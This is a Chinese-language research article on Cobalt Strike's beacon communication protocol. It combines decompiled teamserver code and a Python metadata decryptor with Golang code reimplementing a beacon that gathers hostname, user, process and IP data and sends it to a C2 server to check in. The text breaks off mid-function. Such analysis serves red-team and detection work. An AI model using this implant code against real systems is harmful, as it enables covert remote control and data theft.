酷应用

【干货】cobaltstrike通信协议研究

百家 作者:平安安全应急响应中心 2022-02-18 13:37:14

作者简介 /Profile/

罗逸,平安科技银河实验室资深安全研究员,从业7年,专注红蓝对抗研究,擅长免杀技术、目标控制、内网渗透等。



目录
0x01 HTTP/HTTPS Beacon通信过程
         1.1 Beacon的源数据包
                 1.1.1 封包、解包http get请求
                         解包
                         封包
                 1.1.2 解析Beacon 源数据
                         解析
                         验证解析
                         封包
                         测试上线
         1.2 下发Beacon的task数据
                 1.2.1 封装task任务数据
                 1.2.2 task任务的数据格式
                 1.2.3 使用python脚本测试解包
                 1.2.4 使用golang完成解包
         1.3 Beacon返回的task任务数据
                 1.3.1 解析返回的task任务数据
                 1.3.2 task任务返回数据的格式
                 1.3.3 使用python解析task任务返回的数据
                 1.3.4 使用golang封包task返回的任务数据
0x02 跨平台http/https Beacon
0x03 Bind tcp Beacon通信过程
         3.1 解析bindtcp源数据
                 3.1.1 验证解析数据
                 3.1.2 golang模拟connect命令封包
                 3.1.3 关于hint
         3.2 解析bindtcp task返回数据
                 3.2.1 验证解析数据
                 3.2.2 golang模拟发送请求
0x04 跨平台的bindtcp Beacon
         4.1 子beacon的任务过程
         4.2 父beacon的任务过程



第一部分
HTTP/HTTPS Beacon通信过程


如上:

1. 我们的beacon先是搜集主机的一些信息和生成一个随机的bid然后通过rsa加密后用http协议get方式将数据发送给teamserver;
2. teamserver收到这个上线包之后,rsa解密获得主机信息,并显示在target列表中;
3. beacon发送上线包之后就会进入一个while循环,等到sleep时间到了之后,就http get去;
teamserver拉取命令列表,如果此时的teamserver没得命令,就又进入休眠时间;
4. 当我们在teamserver的beacon console中输入了命令时,beacon http get拉取命令命令时,teamserver就会在http get response中返回命令队列,beacon收到队列后依次去执行;
5. 执行时,如果有执行结果返回,beacon会等待当前的休眠周期结束,结束休眠周期后,通过httppost方法将AES加密的执行结果返回给teamserver;
6. teamserver会模拟一个http post response返回给beacon,使得这个http请求看起来是合理的。


1.1 Beacon的源数据包


beacon上线时,会收集一些当前机器的信息和生成一个随机的bid并用teamserver中生成的公钥进行加密,然后还需要根据我们指定的profile中模拟的http请求进行进行一次封装,最后再通过http get请求发送到teamserver。

1.1.1 封包、解包http get请求

解包

cobaltstrike从http get请求中提取加密之后的源数据,代码如下:
decompiled_src/beacon/BeaconHTTP.java):
public byte[] serve(String var1, String var2, Properties var3, Properties var4) {    //获取get请求的远程地址,即http回连的外网地址    String var5 = ServerUtils.getRemoteAddress(BeaconHTTP.this.c2profile, var3);    //根据profile在get请求中获取rsa加密后的metadata的hexString    String var6 = BeaconHTTP.this.c2profile.recover(".http-get.client.metadata", var3, var4, BeaconHTTP.this.getPostedData(var4), var1);    //判断源数据是否有效,加密后的源数据是定长的,始终是128字节    if (var6.length() != 0 && var6.length() == 128) {        //监听器        //var5=回连的外网地址        //加密后的元数据字节数组        //null        //0        BeaconEntry var7 = BeaconHTTP.this.controller.process_beacon_metadata(BeaconHTTP.this.listener, var5, CommonUtils.toBytes(var6), (String)null, 0);        if (var7 == null) {            MudgeSanity.debugRequest(".http-get.client.metadata", var3, var4, "", var1, var5);            return new byte[0];        } else {            //获取beacon队列任务            byte[] var8 = BeaconHTTP.this.controller.dump(var7.getId(), 921600, 1048576);            //任务队列有任务            if (var8.length > 0) {                //返回解密的任务数据                byte[] var9 = BeaconHTTP.this.controller.getSymmetricCrypto().encrypt(var7.getId(), var8);                return var9;            } else {                return new byte[0];            }        }    } else {        CommonUtils.print_error("Invalid session id");        MudgeSanity.debugRequest(".http-get.client.metadata", var3, var4, "", var1, var5);        return new byte[0];    }}

这里实际解析profile是在decompiled_src/c2profile/Profile.java的recover函数和decompiled_src/c2profile/Program.java的recover函数,代码台长,就不贴了。原理如下:

比如我们编写一个profile,其中有关于http get请求的模拟设置如下:

http-get {    set uri "/api/getid";    client {        header "Accept" "*/*";        metadata {            base64;            prepend "SESSIONID=";            header "Cookie";        }    }
    server {        header "Server" "Pingan Frontend Proxy";        header "x-pingan-id" "wwvdT1M01kspYwKlmJIe0delKPUqYiRw6VYJKw9kekjO01FMl2QIStx=";        header "X-Frame-Options" "SAMEORIGIN";        header "Content-Type" "image/png";        output {           # mask;            base64;            prepend ".PNG";            print;        }    }}

使用c2lint解析之后的实际http get请求如下:
GET /api/getid HTTP/1.1Accept: */*Cookie: SESSIONID=WI71wcgrH+kAG/NBYK5qCQ==User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.177

其中Cookie中对应的SESSIONID的值就是加密之后的源数据。这里的Cookie和SESSIONID是自定义的,所以需要cobaltstrike根据实际的profile解析。

当收到http get请求时,cobaltstrike就会根据profile的设置提取出Cookie中SESSIONID的值,也就是WI71wcgrH+kAG/NBYK5qCQ==,将这个值进行base64解密,得到的就是rsa加密后的源数据。

封包

模拟对于的http get的请求完善http header。
Getheader = req.Header{    "Cookie":"SESSIONID=%ENCDATA%",    "Accept":"*/*",    "User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)",
}

然后将需要发送的数据替换其中的%ENCDATA%,再进行http 发送。
func HttpGet(url string, encData string) []byte {    httpRequest := req.New()    for k,v := range config.Getheader{        if strings.Contains(v,"%ENCDATA%"){            config.Getheader[k] = strings.Replace(v, "%ENCDATA%", encData, -1 )        }    }
    resp, err := httpRequest.Get(url, config.Getheader)    if err != nil {        fmt.Printf("[-] Get http data error: %s\n", err.Error())        return  nil    }
    defer resp.Response().Body.Close()    if resp.Response().StatusCode != http.StatusOK {        fmt.Printf("[-] Get http response status code: %s\n", resp.Response().StatusCode)        return nil    }else {        return resp.Bytes()    }}

调用httpGet函数,将beacon的源数据发送到ts。
func FirstBlood() bool {    encryptedMetaInfo = EncryptedMetaInfo()    for {        respBytes := HttpGet(config.GetUrl, encryptedMetaInfo)        if respBytes != nil {            break        }        time.Sleep(time.Duration(config.Sleep) * time.Millisecond)    }    return true}

1.1.2 解析Beacon 源数据

解析

将rsa加密之后的源数据提取出来之后,就需要解密这些源数据,dns/AsymmetricCrypto.class
public byte[] decrypt(byte[] var1) {    byte[] var2 = new byte[0];
    try {        //rsa解密        synchronized(this.cipher) {            this.cipher.init(2, this.privatekey);            var2 = this.cipher.doFinal(var1);        }
        DataInputStream var3 = new DataInputStream(new ByteArrayInputStream(var2));        int var4 = var3.readInt();        if (var4 != 48879) { //对比魔术头 4字节            System.err.println("Magic number failed :( [RSA decrypt]");            return new byte[0];        } else {            int var5 = var3.readInt();            if (var5 > 117) {//对比metadata数据长度 4字节                System.err.println("Length field check failed :( [RSA decrypt]");                return new byte[0];            } else {                byte[] var6 = new byte[var5];                var3.readFully(var6, 0, var5);                return var6;            }        }    } catch (Exception var8) {        MudgeSanity.logException("RSA decrypt", var8, false);        return new byte[0];    }}

处理解密之后的源数据src/beacon/BeaconC2.java:
public BeaconEntry process_beacon_metadata(ScListener var1, String var2, byte[] var3, String var4, int var5) {    // 先用ts的私钥进行rsa解密    byte[] var6 = this.getAsymmetricCrypto().decrypt(var3);    if (var6 != null && var6.length != 0) {        //byte[] 转 string        String var7 = CommonUtils.bString(var6);        //16 globalkey,用来计算beacon task任务需要的AESkey和HashMac        String var8 = var7.substring(0, 16);        //2 编码相关        String var9 = WindowsCharsets.getName(CommonUtils.toShort(var7.substring(16, 18)));        //2 编码相关        String var10 = WindowsCharsets.getName(CommonUtils.toShort(var7.substring(18, 20)));
        String var11 = ""; //回连的listener名称        BeaconEntry var12;        if (var1 != null) {            var11 = var1.getName();        } else if (var4 != null) {            //父beacon对应的回连的listener            var12 = this.getCheckinListener().resolveEgress(var4);            if (var12 != null) {                var11 = var12.getListenerName();            }        }
        //////////////        //var6 rsa 解密后的数据        //var9 编码相关参数        //var2 回连的外网ip        //var11 监听器名称        //////////////        var12 = new BeaconEntry(var6, var9, var2, var11);        if (!var12.sane()) {            CommonUtils.print_error("Session " + var12 + " metadata validation failed. Dropping");            return null;        } else {            // beaconid            //var9 编码相关参数            //var10 编码相关参数            this.getCharsets().register(var12.getId(), var9, var10);            //父beacon不为空,说明是通过父beacon向外连接的            if (var4 != null) {                //初始化link的父beacon                var12.link(var4, var5);            }
            //将回连Beacon的bid和他的Global key进行绑定            this.getSymmetricCrypto().registerKey(var12.getId(), CommonUtils.toBytes(var8));            if (this.getCheckinListener() != null) {                this.getCheckinListener().checkin(var1, var12);            } else {                CommonUtils.print_stat("Checkin listener was NULL (this is good!)");            }
            return var12;        }    } else {        CommonUtils.print_error("decrypt of metadata failed");        return null;    }}

解析源数据,对应的代码decompiled_src/common/BeaconEntry.java。
//var1 源数据public BeaconEntry(byte[] var1, String var2, String var3, String var4) {    boolean var5;    try {        DataParser var6 = new DataParser(var1);        var6.big();        //跳过前20字节(16字节globalkey+2字节ANSI+2字节OEM)        var6.consume(20);        this.id = Long.toString(CommonUtils.toUnsignedInt(var6.readInt()));//bid 4字节        this.pid = Long.toString(CommonUtils.toUnsignedInt(var6.readInt()));//pid 4字节        this.port = Integer.toString(CommonUtils.toUnsignedShort(var6.readShort()));//port 2字节        byte var7 = var6.readByte(); //metaDataFlag,用来判断barch的 1字节        if (CommonUtils.Flag(var7, 1)) {            this.barch = "";            this.pid = "";            this.is64 = "";        } else if (CommonUtils.Flag(var7, 2)) {            this.barch = "x64";        } else {            this.barch = "x86";        }
        this.is64 = CommonUtils.Flag(var7, 4) ? "1" : "0";        var5 = CommonUtils.Flag(var7, 8);        byte var8 = var6.readByte();//大版本号 1字节        byte var9 = var6.readByte();//小版本号 1字节        this.ver = var8 + "." + var9;        this.build = var6.readShort();//构建号 2字节        byte[] var10 = var6.readBytes(4); //gmh_gpa 4字节        this.ptr_gmh = var6.readBytes(4); //gmh函数地址 4字节        this.ptr_gpa = var6.readBytes(4); //gpa函数地址 4字节        if ("x64".equals(this.barch)) {            this.ptr_gmh = CommonUtils.join(var10, this.ptr_gmh);            this.ptr_gpa = CommonUtils.join(var10, this.ptr_gpa);        }
        this.ptr_gmh = CommonUtils.bswap(this.ptr_gmh);        this.ptr_gpa = CommonUtils.bswap(this.ptr_gpa);        var6.little();        this.intz = AddressList.toIP(CommonUtils.toUnsignedInt(var6.readInt()));//localip 4字节        var6.big();        if ("0.0.0.0".equals(this.intz)) {            this.intz = "unknown";        }    } catch (IOException var11) {        MudgeSanity.logException("Could not parse metadata!", var11, false);        this.sane = false;        return;    }    //上面的从meta data中获取的就是源数据头,是每个beacon回连的源数据都必须的,一共51字节
    //后续的数据是一个字符串列表包括了机器名、用户名等。    String var12 = CommonUtils.bString(Arrays.copyOfRange(var1, 51, var1.length), var2);    String[] var13 = var12.split("\t");    if (var13.length > 0) {        this.comp = var13[0]; //机器名    }
    if (var13.length > 1) {        this.user = var13[1]; //用户名    }
    if (var13.length > 2) {        if (this.isSSH()) {            this.ver = var13[2]; //版本        } else {            this.proc = var13[2]; //process name        }    }
    if (var5) {        this.user = this.user + " *"; //是否是管理员用户    }
    this.ext = var3;    this.chst = var2;    this.lname = var4;    this.sane = this.sanity();}

Beacon并不是直接发送AES keyHMAC key而是发送Global key,然后cs计算这个字符串的哈希值 (32位),这个哈希值的前16位作为AES key后16位作为HMAC key,dns/BaseSecurity.java代码如下:
public void registerKey(String var1, byte[] var2) {    synchronized(this) {        if (keymap.containsKey(var1)) {            return;        }    }
    try {        MessageDigest var3 = MessageDigest.getInstance("SHA-256");        byte[] var4 = var3.digest(var2);        byte[] var5 = Arrays.copyOfRange(var4, 0, 16);        byte[] var6 = Arrays.copyOfRange(var4, 16, 32);        Session var7 = new Session();        var7.key = new SecretKeySpec(var5, "AES"); //aes key        var7.hash_key = new SecretKeySpec(var6, "HmacSHA256"); //HMAC        synchronized(this) {            keymap.put(var1, var7);        }    } catch (Exception var11) {        var11.printStackTrace();    }}

我们根据cobaltstrike解析源数据的方法,通过python来实现同样的功能,方便我们验证beacon的meta data,如下:
'''Beacon元数据'''import binasciiimport hashlibimport M2Cryptoimport base64import hexdump
PRIVATE_KEY = """-----BEGIN RSA PRIVATE KEY-----MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBAJRT8xnRHtWnv2iL3Kqo0s5swaao...rH0+XxA0dI0=-----END RSA PRIVATE KEY-----"""
base64_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def HexToByte( hexStr ):    return bytes.fromhex(hexStr)
#encode_data = HexToByte("873b8a747e627424c23a2959b6314905fb3a683401eff8a792774f94c7cf5d4b363fa3cf70a83e86886fbab1eea85bde67aaed95f16dddfa2c76c310ca94f449e7945ba182e1c48a82aeb23adcad007e7a80666cefdad56a8c63a2077abddcd26d20cf962f052f1c7607cc8c5012ba50f126021d978c273edb54ecaf60f744a7")encode_data = base64.b64decode("DltOc8INq7p9Pv+hmkLuhvSAm+wH2RZ7sixOxf6U4+Jr46TAlDNBj06KcXB054BcdMDqp91+KW8R9VF8P49FYa3cPcqgiohmuEbGthjGLzgR3zEaUvuQ7xriMsjgbqNQ1+/2bdqsHYtVBT+GPdddkrquZie7H+LGchaJfTy0wPA=")
pubkey = M2Crypto.RSA.load_key_string(PRIVATE_KEY.format(base64_key).encode())ciphertext = pubkey.private_decrypt(encode_data, M2Crypto.RSA.pkcs1_padding)
def isFlag(var, flag):    return (var & flag) == flag

def toIP(var):    var2 = (var & -16777216) >> 24    var4 = (var & 16711680) >> 16    var6 = (var & 65280) >> 8    var8 = var & 255    return str(var2) + "." + str(var4) + "." + str(var6) + "." + str(var8)

def getName(var0):    if var0 == 37:        return "IBM037"    elif var0 == 437:        return "IBM437"    elif var0 == 500:        return "IBM500"    elif var0 == 708:        return "ISO-8859-6"    elif var0 == 709:        return ""    elif var0 == 710:        return ""    elif var0 == 720:        return "IBM437"    elif var0 == 737:        return "x-IBM737"    elif var0 == 775:        return "IBM775"    elif var0 == 850:        return "IBM850"    elif var0 == 852:        return "IBM852"    elif var0 == 855:        return "IBM855"    elif var0 == 857:        return "IBM857"    elif var0 == 858:        return "IBM00858"    elif var0 == 860:        return "IBM860"    elif var0 == 861:        return "IBM861"    elif var0 == 862:        return "IBM862"    elif var0 == 863:        return "IBM863"    elif var0 == 864:        return "IBM864"    elif var0 == 865:        return "IBM865"    elif var0 == 866:        return "IBM866"    elif var0 == 869:        return "IBM869"    elif var0 == 870:        return "IBM870"    elif var0 == 874:        return "x-windows-874"    elif var0 == 875:        return "IBM875"    elif var0 == 932:        return "Shift_JIS"    elif var0 == 936:        return "x-mswin-936"    elif var0 == 949:        return "x-windows-949"    elif var0 == 950:        return "Big5"    elif var0 == 1026:        return "IBM1026"    elif var0 == 1047:        return "IBM1047"    elif var0 == 1140:        return "IBM01140"    elif var0 == 1141:        return "IBM01141"    elif var0 == 1142:        return "IBM01142"    elif var0 == 1143:        return "IBM01143"    elif var0 == 1144:        return "IBM01144"    elif var0 == 1145:        return "IBM01145"    elif var0 == 1146:        return "IBM01146"    elif var0 == 1147:        return "IBM01147"    elif var0 == 1148:        return "IBM01148"    elif var0 == 1149:        return "IBM01149"    elif var0 == 1200:        return "UTF-16LE"    elif var0 == 1201:        return "UTF-16BE"    elif var0 == 1250:        return "windows-1250"    elif var0 == 1251:        return "windows-1251"    elif var0 == 1252:        return "windows-1252"    elif var0 == 1253:        return "windows-1253"    elif var0 == 1254:        return "windows-1254"    elif var0 == 1255:        return "windows-1255"    elif var0 == 1256:        return "windows-1256"    elif var0 == 1257:        return "windows-1257"    elif var0 == 1258:        return "windows-1258"    elif var0 == 1361:        return "x-Johab"    elif var0 == 10000:        return "x-MacRoman"    elif var0 == 10001:        return ""    elif var0 == 10002:        return ""    elif var0 == 10003:        return ""    elif var0 == 10004:        return "x-MacArabic"    elif var0 == 10005:        return "x-MacHebrew"    elif var0 == 10006:        return "x-MacGreek"    elif var0 == 10007:        return "x-MacCyrillic"    elif var0 == 10008:        return ""    elif var0 == 10010:        return "x-MacRomania"    elif var0 == 10017:        return "x-MacUkraine"    elif var0 == 10021:        return "x-MacThai"    elif var0 == 10029:        return "x-MacCentralEurope"    elif var0 == 10079:        return "x-MacIceland"    elif var0 == 10081:        return "x-MacTurkish"    elif var0 == 10082:        return "x-MacCroatian"    elif var0 == 12000:        return "UTF-32LE"    elif var0 == 12001:        return "UTF-32BE"    elif var0 == 20000:        return "x-ISO-2022-CN-CNS"    elif var0 == 20001:        return ""    elif var0 == 20002:        return ""    elif var0 == 20003:        return ""    elif var0 == 20004:        return ""    elif var0 == 20005:        return ""    elif var0 == 20105:        return ""    elif var0 == 20106:        return ""    elif var0 == 20107:        return ""    elif var0 == 20108:        return ""    elif var0 == 20127:        return "US-ASCII"    elif var0 == 20261:        return ""    elif var0 == 20269:        return ""    elif var0 == 20273:        return "IBM273"    elif var0 == 20277:        return "IBM277"    elif var0 == 20278:        return "IBM278"    elif var0 == 20280:        return "IBM280"    elif var0 == 20284:        return "IBM284"    elif var0 == 20285:        return "IBM285"    elif var0 == 20290:        return "IBM290"    elif var0 == 20297:        return "IBM297"    elif var0 == 20420:        return "IBM420"    elif var0 == 20423:        return ""    elif var0 == 20424:        return "IBM424"    elif var0 == 20833:        return ""    elif var0 == 20838:        return "IBM-Thai"    elif var0 == 20866:        return "KOI8-R"    elif var0 == 20871:        return "IBM871"    elif var0 == 20880:        return ""    elif var0 == 20905:        return ""    elif var0 == 20924:        return ""    elif var0 == 20932:        return "EUC-JP"    elif var0 == 20936:        return "GB2312"    elif var0 == 20949:        return ""    elif var0 == 21025:        return "x-IBM1025"    elif var0 == 21027:        return ""    elif var0 == 21866:        return "KOI8-U"    elif var0 == 28591:        return "ISO-8859-1"    elif var0 == 28592:        return "ISO-8859-2"    elif var0 == 28593:        return "ISO-8859-3"    elif var0 == 28594:        return "ISO-8859-4"    elif var0 == 28595:        return "ISO-8859-5"    elif var0 == 28596:        return "ISO-8859-6"    elif var0 == 28597:        return "ISO-8859-7"    elif var0 == 28598:        return "ISO-8859-8"    elif var0 == 28599:        return "ISO-8859-9"    elif var0 == 28603:        return "ISO-8859-13"    elif var0 == 28605:        return "ISO-8859-15"    elif var0 == 29001:        return ""    elif var0 == 38598:        return "ISO-8859-8"    elif var0 == 50220:        return "ISO-2022-JP"    elif var0 == 50221:        return "ISO-2022-JP-2"    elif var0 == 50222:        return "ISO-2022-JP"    elif var0 == 50225:        return "ISO-2022-KR"    elif var0 == 50227:        return "ISO-2022-CN"    elif var0 == 50229:        return "ISO-2022-CN"    elif var0 == 50930:        return "x-IBM930"    elif var0 == 50931:        return ""    elif var0 == 50933:        return "x-IBM933"    elif var0 == 50935:        return "x-IBM935"    elif var0 == 50936:        return ""    elif var0 == 50937:        return "x-IBM937"    elif var0 == 50939:        return "x-IBM939"    elif var0 == 51932:        return "EUC-JP"    elif var0 == 51936:        return "GB2312"    elif var0 == 51949:        return "EUC-KR"    elif var0 == 51950:        return ""    elif var0 == 52936:        return "GB2312"    elif var0 == 54936:        return "GB18030"    elif var0 == 57002:        return "x-ISCII91"    elif var0 == 57003:        return "x-ISCII91"    elif var0 == 57004:        return "x-ISCII91"    elif var0 == 57005:        return "x-ISCII91"    elif var0 == 57006:        return "x-ISCII91"    elif var0 == 57007:        return "x-ISCII91"    elif var0 == 57008:        return "x-ISCII91"    elif var0 == 57009:        return "x-ISCII91"    elif var0 == 57010:        return "x-ISCII91"    elif var0 == 57011:        return "x-ISCII91"    elif var0 == 65000:        return ""    elif var0 == 65001:        return "UTF-8"

if ciphertext[0:4] == b'\x00\x00\xBE\xEF':    print("ciphertext: ",binascii.b2a_hex(ciphertext))    # 16    raw_aes_keys = ciphertext[8:24]
    # 2    var9 = ciphertext[24:26]    var9 = int.from_bytes(var9, byteorder='little', signed=False)    var9 = getName(var9)    # 2    var10 = ciphertext[26:28]    var10 = int.from_bytes(var10, byteorder='little', signed=False)    var10 = getName(var10)
    # 4    id = ciphertext[28:32]    id = int.from_bytes(id, byteorder='big', signed=False)    print("Beacon id:%x"%id)
    # 4    pid = ciphertext[32:36]    pid = int.from_bytes(pid, byteorder='big', signed=False)    print("pid:{}".format(pid))
    # 2    port = ciphertext[36:38]    port = int.from_bytes(port, byteorder='big', signed=False)    print("port:{}".format(port))
    # 1    flag = ciphertext[38:39]    flag = int.from_bytes(flag, byteorder='big', signed=False)    # print(flag)
    if isFlag(flag, 1):        barch = ""        pid = ""        is64 = ""    elif isFlag(flag, 2):        barch = "x64"    else:        barch = "x86"
    if isFlag(flag, 4):        is64 = "1"    else:        is64 = "0"
    if isFlag(flag, 8):        bypassuac = "True"    else:        bypassuac = "False"
    print("barch:" + barch)    print("is64:" + is64)    print("bypass:" + bypassuac)
    # 2    var_1 = ciphertext[39:40]    var_2 = ciphertext[40:41]    var_1 = int.from_bytes(var_1, byteorder='big', signed=False)    var_2 = int.from_bytes(var_2, byteorder='big', signed=False)    windows_var = str(var_1) + "." + str(var_2)    print("windows var:" + windows_var)
    # 2    windows_build = ciphertext[41:43]    windows_build = int.from_bytes(windows_build, byteorder='big', signed=False)    print("windows build:{}".format(windows_build))
    # 4    x64_P = ciphertext[43:47]
    # 4    ptr_gmh = ciphertext[47:51]    # 4    ptr_gpa = ciphertext[51:55]
    # if ("x64".equals(this.barch)) {    # this.ptr_gmh = CommonUtils.join(var10, this.ptr_gmh)    # this.ptr_gpa = CommonUtils.join(var10, this.ptr_gpa)    # }    #    # this.ptr_gmh = CommonUtils.bswap(this.ptr_gmh)    # this.ptr_gpa = CommonUtils.bswap(this.ptr_gpa)
    # 4    intz = ciphertext[55:59]    intz = int.from_bytes(intz, byteorder='little', signed=False)    intz = toIP(intz)
    if intz == "0.0.0.0":        intz = "unknown"    print("host:" + intz)
    if var9 == None:        ddata = ciphertext[59:len(ciphertext)].decode("ISO8859-1")    else:        # ??x-mswin-936        # ddata = ciphertext[59:len(ciphertext)].decode(var9)        ddata = ciphertext[59:len(ciphertext)].decode("ISO8859-1")
    ddata = ddata.split("\t")    if len(ddata) > 0:        computer = ddata[0]    if len(ddata) > 1:        username = ddata[1]    if len(ddata) > 2:        process = ddata[2]
    print("PC name:" + computer)    print("username:" + username)    print("process name:" + process)
    raw_aes_hash256 = hashlib.sha256(raw_aes_keys)    digest = raw_aes_hash256.digest()    aes_key = digest[0:16]    hmac_key = digest[16:]
    print("AES key:{}".format(aes_key.hex()))    print("HMAC key:{}".format(hmac_key.hex()))
    print(hexdump.hexdump(ciphertext))

验证解析

我们使用cobaltstrike新建一个http的监听,执行上线,然后使用wareshark抓取返回的数据。
 

解析后的结果如下:


其中的AES key用来加解密后续此beacon的task任务,HAMC用来验证task任务返回数据的正确性。

封包

根据cobaltstrike的解析源数据的过程,我们得到metadata源数据的格式如下:


我们用golang来实现的对应的封装源数据的过程,如下:
func MakeMetaInfo() []byte {
    clientIDBytes := make([]byte, 4)    binary.BigEndian.PutUint32(clientIDBytes, uint32(config.ClientID))
    processID := sysinfo.GetPID()    processIDBytes := make([]byte, 4)    binary.BigEndian.PutUint32(processIDBytes, uint32(processID))
    port := 22    sshPortBytes := make([]byte, 2)    binary.BigEndian.PutUint16(sshPortBytes, uint16(port))
    metadataFlag := sysinfo.GetMetaDataFlag()    flagBytes := make([]byte, 1)    flagBytes[0] = byte(metadataFlag)
    //for OS Version    osVersion := sysinfo.GetOSVersion()    osVerSlice := strings.Split(string(osVersion), ".")    osMajorVerison := 0    osMinorVersion := 0    osBuild := 0    if len(osVerSlice) == 3 {        osMajorVerison, _ = strconv.Atoi(osVerSlice[0])        osMinorVersion, _ = strconv.Atoi(osVerSlice[1])        osBuild, _ = strconv.Atoi(osVerSlice[2])    } else if len(osVerSlice) == 2 {        osMajorVerison, _ = strconv.Atoi(osVerSlice[0])        osMinorVersion, _ = strconv.Atoi(osVerSlice[1])    }    majorVerBytes := make([]byte, 1)    minorVerBytes := make([]byte, 1)    buildBytes := make([]byte, 2)    majorVerBytes[0] = byte(osMajorVerison)    minorVerBytes[0] = byte(osMinorVersion)    binary.BigEndian.PutUint16(buildBytes, uint16(osBuild))
    ptrGMHGPA := 0    ptrGMHGPABytes := make([]byte, 4)    binary.BigEndian.PutUint32(ptrGMHGPABytes, uint32(ptrGMHGPA))
    ptrGMHFuncAddr := 0    ptrGMHBytes := make([]byte, 4)    binary.BigEndian.PutUint32(ptrGMHBytes, uint32(ptrGMHFuncAddr))
    ptrGPAFuncAddr := 0    ptrGPABytes := make([]byte, 4)    binary.BigEndian.PutUint32(ptrGPABytes, uint32(ptrGPAFuncAddr))
    localIP := sysinfo.GetLocalIPInt()    localIPBytes := make([]byte, 4)    binary.BigEndian.PutUint32(localIPBytes, uint32(localIP))
    hostName := sysinfo.GetComputerName()    currentUser := sysinfo.GetUsername()    OS := sysinfo.GetCurrentOS()
    osInfo := fmt.Sprintf("%s\t%s\t%s", hostName, currentUser, OS)    osInfoBytes := []byte(osInfo)    binary.BigEndian.PutUint32(localIPBytes, uint32(localIP))    onlineInfoBytes := util.BytesCombine(clientIDBytes, processIDBytes, sshPortBytes, flagBytes, majorVerBytes, minorVerBytes, buildBytes, ptrGMHGPABytes, ptrGMHBytes, ptrGPABytes, localIPBytes, osInfoBytes)
    localeANSI := sysinfo.GetCodePageANSI()    localeOEM := sysinfo.GetCodePageOEM()    metaInfo := util.BytesCombine(config.GlobalKey, localeANSI, localeOEM, onlineInfoBytes)
    magicNum := sysinfo.GetMagicHead()    metaLen := WritePacketLen(metaInfo)    packetToEncrypt := util.BytesCombine(magicNum, metaLen, metaInfo)    return packetToEncrypt}

封装完成之后,使用ts的公钥进行rsa加密:
func RsaEncrypt(origData []byte) ([]byte, error) {
    block, _ := pem.Decode([]byte(config.RsaPublicKey))    if block == nil {        return nil, errors.New("public key error")    }    pubInterface, err := x509.ParsePKIXPublicKey(block.Bytes)    if err != nil {        return nil, err    }    pub := pubInterface.(*rsa.PublicKey)    return rsa.EncryptPKCS1v15(rand.Reader, pub, origData)}

测试上线

如上,我们使用golang语言按照cobaltstrike的封包格式和源数据格式进行组包封装,看是否能够上线。首先配置profile的内容,包括回连地址,全局变量c2profile.go。
var (    RsaPublicKey string = "-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GN...-----END PUBLIC KEY-----"    C2 string = "***.**.***.**"    Port string = "**"    SSL bool = false    Sleep int = 2500    Jitter int = 500
    GetPath string = "/api/getid"    GetPrepend int = 4    GetAppend int = 0
    PostPath string = "/api/postid?s=1124&d_referer=http%3A%2F%2Fbank.pingan.com"    PostPrepend string = ".PNG"    PostAppend string = "")

配置http请求头
Getheader = req.Header{    "Cookie":"SESSIONID=%ENCDATA%",    "Accept":"*/*",    "User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)",}
Postheader = req.Header{    "Cookie":"JSESSION=%ENCBEACONID%",    "Content-Type":"image/png",    "Accept":"*/*",    "User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)",}

然后调用源数据组包函数,获得rsa加密的源数据,再进行http封包,最终发送给ts。
func FirstBlood() bool {    encryptedMetaInfo = EncryptedMetaInfo()//源数据封包并加密    for {        respBytes := HttpGet(config.GetUrl, encryptedMetaInfo)//http封包并发送        if respBytes != nil {            break        }        time.Sleep(time.Duration(config.Sleep) * time.Millisecond)    }    return true}

测试结果,成功上线:



1.2 下发Beacon的task数据


上面介绍了beacon上线的通信数据,现在我们来看ts给beacon下发命令和执行结果返回的详细情况。


如上图是一次task下发到返回执行结果的过程:

1. beacon使用http get请求向ts发送上线数据的同时,获取ts返回的http get response即为封包的task任务数据。

2. 根据配置的profile信息,删除prepend data和append data得到AES加密的task数据。

3. AES解密task数据,并根据实际的task任务的类型执行相应的操作,并获得执行结果。

4. 将执行结果AES加密,并封包global key计算获得的HMAC,再进行base64编码。

5. 将执行结果封包后的数据加上prepend data和append data。

6. 最后进行http post数据封包,再发送给ts。

1.2.1 封装task任务数据

当ts在收到http get请求之后,判断是否是beacon源数据返回之后就会查看ts的任务列表,如果有任务,就会加密发送。decompiled_src/beacon/BeaconHTTP.java
BeaconEntry var7 = BeaconHTTP.this.controller.process_beacon_metadata(BeaconHTTP.this.listener, var5, CommonUtils.toBytes(var6), (String)null, 0); //解析http get返回的源数据if (var7 == null) {    MudgeSanity.debugRequest(".http-get.client.metadata", var3, var4, "", var1, var5);    return new byte[0];} else {    //获取beacon队列任务    byte[] var8 = BeaconHTTP.this.controller.dump(var7.getId(), 921600, 1048576);    //任务队列有任务    if (var8.length > 0) {        //加密任务数据        byte[] var9 = BeaconHTTP.this.controller.getSymmetricCrypto().encrypt(var7.getId(), var8);        return var9;    } else {        return new byte[0];    }}

跟进encrypt函数就是aes加密task任务数据。
//var1 bid//var2 task任务数据(taskType+taskBuffer)public byte[] encrypt(String var1, byte[] var2) {    try {        if (!this.isReady(var1)) {            CommonUtils.print_error("encrypt: No session for '" + var1 + "'");            return new byte[0];        }
        ByteArrayOutputStream var3 = new ByteArrayOutputStream(var2.length + 1024);        DataOutputStream var15 = new DataOutputStream(var3);        SecretKey var5 = this.getKey(var1); //获取对应beacon的AESkey        SecretKey var6 = this.getHashKey(var1);//获取对应beacon的hashmac        var3.reset();        var15.writeInt((int)(System.currentTimeMillis() / 1000L)); //写入时间戳        var15.writeInt(var2.length);    //写入task任务数据长度        var15.write(var2, 0, var2.length);        this.pad(var3);        Object var7 = null;        byte[] var16;        synchronized(this.in) {            var16 = this.do_encrypt(var5, var3.toByteArray()); //AES加密任务数据        }
